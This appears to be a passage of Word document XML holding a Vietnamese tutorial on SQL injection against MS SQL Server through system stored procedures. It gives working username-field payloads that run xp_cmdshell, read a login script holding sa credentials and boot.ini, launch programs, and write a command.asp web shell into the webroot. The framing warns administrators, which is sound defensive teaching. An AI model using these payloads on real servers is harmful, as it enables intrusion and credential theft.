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FA4" w:rsidRDefault="00D15FA4" w:rsidP="002769D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="333333"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="333333"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>NHỮNG STORE PROCEDURE VÀ CÂU LỆNH HỆ THỐNG CÓ THỂ BỊ LỢI DỤNG:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0FB2" w:rsidRPr="008C0FB2" w:rsidRDefault="008C0FB2" w:rsidP="002769D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="002769D0" w:rsidRPr="008C0FB2" w:rsidRDefault="002769D0" w:rsidP="002769D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Những Store procedure và câu lệnh sql sau có thể sẽ là công cụ hữu ích cho kẻ phá hoại lợi dụng tấn công vào hệ thống của bạn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002769D0" w:rsidRPr="008C0FB2" w:rsidRDefault="002769D0" w:rsidP="002769D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>a/Kẻ phá hoại dùng</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>tore procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>như xp_cmdshell chẳng hạn để thực thi một câu lệnh command trên hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002769D0" w:rsidRPr="008C0FB2" w:rsidRDefault="002769D0" w:rsidP="002769D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>b/Dùng procedure xp_regxxx để thao tác trên register của hệ thống bao gồm:</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>xp_regaddmultistring</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>xp_regdeletekey</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>xp_regdeletevalue</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>xp_regenumkeys</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>xp_regenumvalues</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>xp_regread</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>xp_regremovemultistring</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>xp_regwrite</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>c/Dùng cú pháp “</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>bulk insert</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>” để đọc bất kỳ file nào trên hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002769D0" w:rsidRPr="008C0FB2" w:rsidRDefault="002769D0" w:rsidP="002769D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>d/Dùng câu lệnh “</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>bcp</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>” để tạo file nhị phân trên hệ thống</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002769D0" w:rsidRPr="008C0FB2" w:rsidRDefault="002769D0" w:rsidP="002769D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Sau đây là một số ví dụ:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002769D0" w:rsidRPr="008C0FB2" w:rsidRDefault="002769D0" w:rsidP="002769D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>-Xem danh sách file hệ thống:</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>Username:</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>‘; exec master..xp_cmdshell ‘dir c:\ &gt; c:\danhsachfile.txt’ –</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002769D0" w:rsidRPr="008C0FB2" w:rsidRDefault="002769D0" w:rsidP="002769D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>-Xem thông tin của user hệ thống(hoặc có thể tạo user nếu hệ thống cho phép)</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>Username:</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>‘; exec master..xp_cmdshell ‘net1 user’ –</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002769D0" w:rsidRPr="008C0FB2" w:rsidRDefault="002769D0" w:rsidP="002769D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>-Đưa một text file vào table</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>Username:</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>‘; create table bangtam( line varchar(8000) ) –</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002769D0" w:rsidRPr="008C0FB2" w:rsidRDefault="002769D0" w:rsidP="002769D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Sau đó đưa nội dung của textfile bất kỳ vào table</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>Username:</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>‘; bulk insert bangtam from ‘c:\inetpub\wwwroot\process_login.asp’ –</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Username: ‘; bulk insert bangtam from ‘c:\danhsachfile.txt’ –</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002769D0" w:rsidRPr="008C0FB2" w:rsidRDefault="002769D0" w:rsidP="002769D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>từ đó họ có thể xem được nội dung textfile (chẳng hạn nội dung của file process_login.asp có chứa thông tin đăng nhập vào sql server gồm user sa và password hoặc danh sách các file nằm trên ổ đĩa c: trong file danhsachfile.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002769D0" w:rsidRPr="008C0FB2" w:rsidRDefault="002769D0" w:rsidP="002769D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>-Hoặc cho thực thi chương trình notepad.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>Username:</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>‘; declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod @o, ‘run’, NULL, ‘notepad.exe’ –</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002769D0" w:rsidRPr="008C0FB2" w:rsidRDefault="002769D0" w:rsidP="002769D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>-Đọc nội dung textfile bất kỳ:</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>– scripting.filesystemobject example – read a known file</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>declare @o int, @f int, @t int, @ret int</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>declare @line varchar(8000)</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>exec sp_oacreate ‘scripting.filesystemobject’, @o out</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>exec sp_oamethod @o, ‘opentextfile’, @f out, ‘c:\boot.ini’, 1</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>exec @ret = sp_oamethod @f, ‘readline’, @line out</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>while( @ret = 0 )</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>begin</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>print @line</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>exec @ret = sp_oamethod @f, ‘readline’, @line out</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002769D0" w:rsidRPr="008C0FB2" w:rsidRDefault="002769D0" w:rsidP="002769D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>-Tạo file có thể thực thi câu lệnh dos thông qua web:</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>– scripting.filesystemobject example – create a command.asp file in webroot</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>declare @o int, @f int, @t int, @ret int</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>exec sp_oacreate ‘scripting.filesystemobject’, @o out</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>exec sp_oamethod @o, ‘createtextfile’, @f out, ‘c:\inetpub\wwwroot\command.asp’, 1</w:t>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>exec @ret = sp_oamethod @f, ‘writeline’, NULL, ”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002769D0" w:rsidRPr="008C0FB2" w:rsidRDefault="002769D0" w:rsidP="002769D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>-Và còn vô số những điều khác mà kẻ phá hoại có thể thao tác thông qua những store procedure và câu lệnh về hệ thống trong sql.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002769D0" w:rsidRPr="008C0FB2" w:rsidRDefault="002769D0" w:rsidP="002769D0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0FB2">
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Qua đó bạn thấy rõ một điều chỉ là một lỗi nhỏ thôi mà hacker đã có thể hoàn toàn thao tác và thực được tất cả các lệnh trên database cũng như là server và chẳng những thế còn chiếm luôn quyền kiểm soát server của bạn. Vậy thì lỗi này đâu phải người quảng trị hệ thống gây ra.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D15BFB" w:rsidRPr="008C0FB2" w:rsidRDefault="00D15BFB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
